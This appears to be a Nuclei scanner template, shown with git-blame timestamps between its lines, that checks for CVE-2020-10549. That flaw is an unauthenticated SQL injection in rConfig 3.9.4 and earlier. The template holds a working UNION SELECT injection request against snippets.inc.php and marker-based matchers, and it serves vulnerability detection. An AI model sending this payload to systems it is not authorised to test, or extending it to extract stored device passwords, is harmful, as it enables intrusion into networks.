2021-02-14 19:38:42 +00:00
id : CVE-2020-10549
2022-04-21 21:16:41 +00:00
2021-02-14 19:38:42 +00:00
info :
2022-04-21 21:16:41 +00:00
name : rConfig <=3.9.4 - SQL Injection
2021-02-14 19:38:42 +00:00
author : madrobot
2021-09-10 11:26:40 +00:00
severity : critical
2022-04-22 10:38:41 +00:00
description : rConfig 3.9.4 and prior has unauthenticated snippets.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement, granting an attacker
access to monitored network devices.
2021-08-18 11:37:49 +00:00
reference :
2021-03-24 06:54:09 +00:00
- https://github.com/theguly/exploits/blob/master/CVE-2020-10549.py
- https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/
2022-04-21 21:16:41 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-10549
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-10549
cwe-id : CWE-89,CWE-522
2022-04-21 21:16:41 +00:00
tags : cve,cve2020,rconfig,sqli
2021-02-14 19:38:42 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains"
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
words :
- "[project-discovery]"
part : body
2022-04-21 21:16:41 +00:00
# Enhanced by mp on 2022/04/21